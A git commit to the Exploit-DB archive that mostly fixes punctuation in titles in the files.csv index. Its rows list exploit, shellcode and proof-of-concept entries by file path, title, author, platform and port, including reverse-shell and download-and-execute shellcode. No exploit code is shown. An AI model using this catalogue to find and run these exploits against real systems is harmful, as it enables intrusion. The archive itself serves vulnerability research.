DB: 2016-07-09

9 new exploits

Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit

Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)
Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)

Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability
Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability

VLC AMV Dangling Pointer Vulnerability
VLC - AMV Dangling Pointer Vulnerability

Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution
Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution

Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability
Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability

HP Client Automation Command Injection
HP Client - Automation Command Injection

Persistent Systems Client Automation Command Injection RCE
Persistent Systems Client Automation - Command Injection RCE

ElasticSearch Unauthenticated Remote Code Execution
ElasticSearch - Unauthenticated Remote Code Execution

ElasticSearch Search Groovy Sandbox Bypass
ElasticSearch - Search Groovy Sandbox Bypass

Fedora abrt Race Condition Exploit
Fedora - abrt Race Condition Exploit

ProFTPD 1.3.5 Mod_Copy Command Execution
ProFTPD 1.3.5 - Mod_Copy Command Execution

Windows ClientCopyImage Win32k Exploit
Microsoft Windows - ClientCopyImage Win32k Exploit

Wolf CMS Arbitrary File Upload To Command Execution
Wolf CMS - Arbitrary File Upload To Command Execution

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)

Kaseya VSA uploader.aspx Arbitrary File Upload
Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload

Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash
Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)

Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)

NETGEAR ProSafe Network Management System 300 Arbitrary File Upload
NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload

Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
Microsoft  Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

OS X / iOS Suid Binary Logic Error Kernel Code Execution
OS X / iOS - Suid Binary Logic Error Kernel Code Execution

Novell ServiceDesk Authenticated File Upload
Novell ServiceDesk - Authenticated File Upload

Mach Race OS X Local Privilege Escalation Exploit
Mach Race OS X - Local Privilege Escalation Exploit

Oracle ATS Arbitrary File Upload
Oracle Application Testing Suite (ATS) - Arbitrary File Upload

Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF
Hide.Me VPN Client 1.2.4 - Privilege Escalation
InstantHMI 6.1 - Privilege Escalation
Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC
Microsoft WinDbg logviewer.exe - Crash PoC
Linux x86 TCP Reverse Shellcode - 75 bytes
php Real Estate Script 3 - Arbitrary File Disclosure
CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval
Streamo Online Radio And TV Streaming CMS - SQL Injection
This commit is contained in:
Offensive Security 2016-07-09 05:06:22 +00:00
parent c7daadde64
commit 29f0764fac
10 changed files with 925 additions and 27 deletions

View file

@ -1630,7 +1630,7 @@ id,file,description,date,author,platform,type,port
1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability",2006-06-16,K-159,php,webapps,0
1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0
1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0
1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
@ -12872,7 +12872,7 @@ id,file,description,date,author,platform,type,port
14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta - Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0
14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0
14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0
14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0
14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0
@ -13858,7 +13858,7 @@ id,file,description,date,author,platform,type,port
15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability",2011-01-16,"BorN To K!LL",php,webapps,0
16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability",2011-01-16,"Mark Stanislav",php,webapps,0
16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion Vulnerability",2011-01-16,"ALTBTA ",php,webapps,0
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0
@ -14833,7 +14833,7 @@ id,file,description,date,author,platform,type,port
17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69
17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0
17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0
17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0
17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
@ -21506,7 +21506,7 @@ id,file,description,date,author,platform,type,port
24318,platforms/windows/shellcode/24318.c,"Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0
24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0
24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0
24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0
24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0
24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0
@ -26934,7 +26934,7 @@ id,file,description,date,author,platform,type,port
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x /ecrire/trackback.php post_id Parameter XSS",2007-04-11,nassim,php,webapps,0
29839,platforms/php/webapps/29839.txt,"DotClear 1.2.x /tools/thememng/index.php tool_url Parameter XSS",2007-04-11,nassim,php,webapps,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability",2007-04-11,"Carsten Eiram",windows,remote,0
29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 Admin/Index.php Directory Traversal Vulnerability",2007-04-11,Dr.RoVeR,php,webapps,0
29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a CGI Check Cookie Command Remote Authentication Bypass Vulnerability",2007-04-11,"Jon Oberheide",cgi,webapps,0
29843,platforms/windows/remote/29843.txt,"webMethods Glue <= 6.5.1 Console Directory Traversal Vulnerability",2007-04-11,"Patrick Webster",windows,remote,0
@ -32579,7 +32579,7 @@ id,file,description,date,author,platform,type,port
36150,platforms/php/webapps/36150.txt,"Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36151,platforms/php/webapps/36151.txt,"Zyncro 3.0.1.20 Social Network Message Menu SQL Injection Vulnerability",2011-09-22,"Ferran Pichel Llaquet",php,webapps,0
36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC",2015-02-22,"Praveen Darshanam",windows,dos,0
36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465
36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Stored XSS Vulnerability",2015-02-23,"Halil Dalabasmaz",php,webapps,0
36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80
36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
@ -32631,7 +32631,7 @@ id,file,description,date,author,platform,type,port
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
@ -32756,7 +32756,7 @@ id,file,description,date,author,platform,type,port
36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
@ -32829,7 +32829,7 @@ id,file,description,date,author,platform,type,port
36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port
36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0
36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0
36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
@ -33640,7 +33640,7 @@ id,file,description,date,author,platform,type,port
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 - Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - 'diff' Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 - Download & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 - Reboot (28 Bytes)",2015-06-24,B3mB4m,lin_x86,shellcode,0
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
@ -34307,7 +34307,7 @@ id,file,description,date,author,platform,type,port
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80
@ -34557,7 +34557,7 @@ id,file,description,date,author,platform,type,port
38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free Vulnerability (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0
38273,platforms/win32/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38274,platforms/win32/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
38275,platforms/win32/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win32,dos,0
38276,platforms/win32/dos/38276.txt,"Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38277,platforms/win32/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
38278,platforms/win32/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win32,dos,0
@ -34642,7 +34642,7 @@ id,file,description,date,author,platform,type,port
38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
@ -34879,7 +34879,7 @@ id,file,description,date,author,platform,type,port
38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
38612,platforms/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",android,dos,0
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
38613,platforms/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",android,dos,0
38614,platforms/android/dos/38614.txt,"Samsung libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
38615,platforms/windows/dos/38615.txt,"Python 2.7 hotshot Module - pack_string Heap Buffer Overflow",2015-11-03,"John Leitch",windows,dos,0
38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use After Free",2015-11-03,"John Leitch",multiple,dos,0
@ -35544,8 +35544,8 @@ id,file,description,date,author,platform,type,port
39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0
39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <=1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39310,platforms/windows/local/39310.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39312,platforms/lin_x86-64/shellcode/39312.c,"x86_64 Linux xor/not/div Encoded execve Shellcode",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0
39313,platforms/php/webapps/39313.txt,"Food Order Portal 'admin_user_delete.php' Cross Site Request Forgery Vulnerability",2014-09-12,KnocKout,php,webapps,0
39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure Vulnerability",2014-09-15,"Eric Fajardo",hardware,remote,0
@ -35660,7 +35660,7 @@ id,file,description,date,author,platform,type,port
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)",2016-02-10,koczkatamas,windows,local,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port
